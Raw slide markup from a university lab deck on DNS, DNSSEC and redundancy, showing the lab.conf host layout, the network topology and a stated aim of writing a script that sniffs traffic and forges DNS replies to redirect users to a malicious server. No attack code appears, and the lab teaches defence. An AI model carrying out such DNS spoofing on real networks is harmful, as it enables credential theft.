                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59E03884-897D-FD09-C10E-1E877E519FC7}"/>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21508" name="Rectangle 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F04EBFB9-1664-ED5D-AB6D-A37BB74D6FC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="6434123"/>
            <a:ext cx="181822"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800" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F485CAD-2EC6-59EC-3BCF-C8DD83DA15D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7148945" y="4314433"/>
            <a:ext cx="4055062" cy="1088840"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -92427"/>
              <a:gd name="adj2" fmla="val -9961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evil's database is empty, DNSSEC worked. The student's credentials were not stolen by the hacker.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33063298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DF947-D7E3-00CD-1438-FDEFB35207A3}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5122" name="Rectangle 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F69E57E8-76CB-9CA2-D6C2-E7573B3CF4F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>lab configuration with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and redundancy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Subtitle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{386E6019-AF88-C1E8-B036-4063791F1B65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75196423-CAB6-03C0-5686-B3E67A8C0F0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6708A1E5-AE3C-4DFF-C197-98528EC9AB12}"/>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3931038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530F8-8F63-B0A3-C27E-483F254F31F4}"/>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C6027E26-B683-CFEE-CD6C-D5C9F6F5FCE9}"/>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D37430EF-26CB-A2CC-931E-803FDB6C37C4}"/>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2F09ADF4-7678-B090-B580-4B7EBA539554}"/>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99343B8F-765B-7C61-D275-1247B2C19873}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609093" y="1217551"/>
            <a:ext cx="7335694" cy="5063541"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5972742C-3E08-E49F-D54A-A6030F9847DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="69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pc4[0]="B"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4[image]="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/bind:9.16"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2[0]="B"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2[image]="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/base"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[1]="C"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2[1]="C"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[0]="C"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[image]="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/bind:9.16"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[0]="C"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[image]="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/bind:9.16"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FEB7AA0-EC38-51B7-9C19-0DC77C449848}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622"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err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lab.conf</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27980299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7A6A7-9F9F-CFFF-2841-8FEB1152362C}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8197" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD4A1361-28E2-C653-64D7-96590385430D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>content of the lab with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and redundancy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8198" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4628F309-7D17-322B-9EC8-8E55AF463A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>There are three routers, called r1 , r2 and r3 , there are four hosts, called pc1, pc2, pc3 and pc4, and three DNS levels, called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dnsroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dnsit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dnsuni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. The root node has a backup machine called dnsroot2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
              <a:t>they are connected via  three LANs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
              <a:t>we force their MAC addresses to be easily readable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>we will learn how to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>iptables command to block traffic for DNS resolution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>script to sniff traffic and create fake packet to redirect traffic to malicious web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>DNS response validation with DNSSEC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A558B22F-7415-3F1E-7D1D-0AB2295603AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08AAE86E-B0F5-FB08-52AF-38160823A859}"/>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8199" name="Rectangle 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA06A0F6-44D0-A8C2-990A-D182E8B3C4B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9332918" y="5"/>
            <a:ext cx="171608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90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© Computer Networks Research Group Roma Tre</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="179761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05973-D623-96F3-7E8C-A0769A449F0F}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9336" name="Connettore diritto 9335">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FAC2B60-E9AD-42D9-90F1-CD5C95F6798F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8041412" y="3065463"/>
            <a:ext cx="7414" cy="6154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43" name="Connettore diritto 9242">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80C46CCA-5856-6CD9-369C-1215896705C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6403424" y="3065464"/>
            <a:ext cx="7414" cy="6154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235" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81170554-F13F-6AA0-66F3-F1CF00786D1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5292418" y="3045154"/>
            <a:ext cx="4543674" cy="466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23" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{946F34CF-36CC-7987-96E2-FCF27A55A7F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9812223" y="2974820"/>
            <a:ext cx="23872" cy="31620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56" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FF2A64F-06DB-06BB-5032-9B52F18EC9C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2325716" y="6326233"/>
            <a:ext cx="904078" cy="79994"/>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22" name="Connettore diritto 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7C30FE3-88E2-32C1-7F72-E6BE5E84F649}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3229794" y="6156631"/>
            <a:ext cx="181044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B08F6540-7F91-60FD-A727-ADF2B73C1374}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1917704" y="5790799"/>
            <a:ext cx="131027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327" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AD5E6B2-5F12-AC42-90BA-A30FB9284B1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1348638" y="3095873"/>
            <a:ext cx="7415" cy="505625"/>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9305" name="Connettore diritto 9304">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
